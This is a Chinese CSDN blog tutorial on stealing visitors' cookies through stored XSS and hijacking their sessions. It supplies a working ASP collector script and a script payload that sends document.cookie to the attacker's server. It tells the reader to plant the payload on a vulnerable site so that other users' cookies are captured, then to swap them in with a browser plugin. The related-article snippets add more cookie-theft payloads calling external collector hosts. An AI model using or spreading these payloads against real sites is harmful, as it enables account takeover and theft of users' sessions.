xss脚本攻击获取用户cookie信息存储到本地

最新推荐文章于 2023-07-27 15:32:13 发布
最新推荐文章于 2023-07-27 15:32:13 发布
阅读量445 收藏 1
点赞数
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lancis/article/details/118609751
版权

首先准备一个获取cookie的asp脚本

<html>
<title>test</title>
<body>
<%testfile = Server.MapPath("code.txt") 
msg = Request("msg") 
set fs = server.CreateObject("scripting.filesystemobject")
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close()
set fs = nothing%>
</body>
</html>

然后把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。为了测试我自己在IIS下搭了个网站,所以我的xss语句为:

<script>window.open('http://localhost:8000/cookie.asp?msg='+document.cookie)</script>

将该语句输入到有xss漏洞的网站中输入保存,当其他用户打开该页面后,就会触发,然后当前账户的cookie信息就当成参数发到你的网站下的文件里了。
在这里插入图片描述
接下来就可以利用如EditThisCookie等插件进行cookie的替换。

另外过程中可能会出现IIS报错无法执行脚本文件的问题,大概率是因为你没有安装ASP。解决方法如下:
1.打开windows功能安装ASP
在这里插入图片描述
2.IIS下设置ASP,启用父路径
在这里插入图片描述
在这里插入图片描述

Lancis
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解析如何防止XSS跨站脚本攻击
01-31
这些规则适用于所有不同类别的XSS跨站脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
Mlecms 反射型xss && 后台任意文件下载
aixuan9365的博客
06-06 438
应该算0day吧,自己分析出来的,有点鸡肋,不过小cms分析确实比较简单。 xss地址:search.php?word=a><img+src=1+onerror=alert`1`>a&type=1 对于word的参数,他的过滤是这样的 $trim_str = ' .,;[]|+-=_`~!@#$%^&*()<>?{}...
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 865
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
XSS攻击获取用户cookie(get方式)
weixin_43726152的博客
05-06 3797
关于XSS攻击是什么,想必大家都知道了,今天围绕百度随便找的一张流程图来完成一个获取用户cookieXSS实验。 为了和上图数字一致好看些,从序号1开始吧 0x1 用户登入 自行登入。坑自己就可以了,不要坑别人哈。 0x2 找到漏洞点,制作一个危险的url 让前端插入的js是: <script>document.location = 'http://127.0.0.1/pik...
xss攻击获取站点信息以及对应的cookie脚本
kalogen的专栏
09-29 505
&lt;script src=http://is.gd/L1PtPA&gt;&lt;/script&gt;   ======== JS代码如下: ======== (function(){(new Image()).src='http://www.xssserver.com/index.php?do=api&amp;id=P0cbrY&amp;location='+escape((f...
XSS攻击
continue my dream
09-04 2508
背景知识 1.1 什么是XSS攻击   XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本攻击者利
CookieStealer:如何通过 xss 抓取 cookie 用于教育目的的简单示例
05-30
饼干窃取者 这个存储库只是一个例子,如何通过 xss 获取 cookie 以用于教育目的。... 该XSS脚本的特殊之处在于,它不会每次都发送cookie,而仅在cookie更新时发送。 这可以保护攻击者服务器免受存储溢出的影响。
Web应用安全:XSS盗取cookiepayload.pptx
06-18
攻击者将可以获取并发送管理员的cookie的恶意XSS脚本到管理员访问的网站。 当管理员访问网站的时候,恶意的XSS脚本将会被运行。 攻击者就可以接收到管理员自动发送的cookie。 原理分析 实例演示 1.攻击者发送恶意XSS...
CookieProt:Javascript Cookie XSS保护
05-24
CookieProt v 1.0 B 通过JavaScript从XSS保护cookie。 EPTO版权所有(C)2015 将此脚本放在所有内容的开头,以禁用[removed]。 它将通知用户尝试使会话无效。 会话将被破坏,服务器会将违规行为保存在日志中。
Cookie-Pot:A XSS Cookies Receiver.用于接收XSS得到的Cookies的微型NodeJS服务器
06-24
一个用于分发xss脚本与接收XSS得到的Cookies的微型NodeJS服务器。##快速开始将需要分发的js脚本更名后复制入根目录下,覆盖xss.js文件。终端命令node index.js [port|端口号]即可运行日志按照日期,一天一个文件,...
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4686
渗透测试-跨站脚本攻击xss获取cookie
6.5 XSS 获取 Cookie 攻击
qq_55202378的博客
08-20 1344
XSS获取Cookie
XSS平台传输原理
Playwin
03-23 1842
前言:抽个时间,查看了一下自己搭的XSS平台(项目来源)传输数据的原理,究竟是怎样盗取cookie 生成一个盗取cookiecookie.js 分析源码 cookie.js创建一个预加载对象,带着你的cookie等一些数据去访问服务器(xss平台) index.php接受你传过来的数据 测试 抓包,查看数据 总结 在能插入js代码的网页,插入恶意链接,利用该网站的身份发出请...
XSS攻击的简单实现
hxxjxw的博客
04-28 2万+
xss 跨站脚本攻击(Cross Site Script) ①在慕课网跟着教学视频自己编写一个网页 ,用这个网页模拟有XSS漏洞的网站。 在网页源码中插入了这样一句话。 这句话的作用其实是:显示一个搜索框。将搜索框中显示的内容是你用户输入之后的内容。 通过看网站源码,我们可以知道,他让用户在显示框输入一个内容,然后就把这个内容当做显示框内容显示。 ...
Python pyppeteer通过cookie获取数据(cookie爬虫)
墨痕诉清风的博客
08-31 3819
1. 利用EditThisCookie插件获取页面cookie 2. 源码实例 """set browser""" browser = await launch({ "headless": False, "executablePath": "F:\\chrome-win32\\chrome.exe", "args": [ "--disable-gpu",
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3473
xss之反射型(post)获取用户密码
XSS跨站脚本盗取Cookie
Rxk17805428997的博客
10-27 2742
一、XSS跨站脚本如何理解 A站访客受到的XSS攻击的代码是来自于B站而不是A站原本就有的脚本代码所以称为跨站 二、XSS跨站脚本攻击的几个主体 1、攻击者 2、攻击服务器(IP:192.168.1.32) 3、受害者 4、受害站点(IP:192.168.1.89) 三、攻击流程 1、用户正常访问受害站点,站点发送给浏览器cookie,浏览器保存cookie到本地 2、攻击者构造恶意链接或者恶意网页并诱使用户点击或访问,恶意网页index.html内容如下 ``` &l..
2021-09-01 网安实验-XSS-存储XSS获取用户cookie
热门推荐
时光隧道
09-02 4万+
一:存储XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参数,然后再保存起来。所以首先需要写一个接收cookie的页面,它能够接收某个参数,然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下,recv_cookies.php这个文件就是用来接收cookie保存的,源码如下: 2.构造语句 <script>document.write(
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5222
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
xss怎么获取目标cookie
最新发布
08-02
当其他用户或管理员打开包含恶意脚本的页面时,脚本会触发并将用户cookie信息发送到攻击者指定的网站。 引用[2]提供了一个获取cookie的示例代码,其中的cookie.asp文件会将获取到的cookie信息写入到code.txt文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值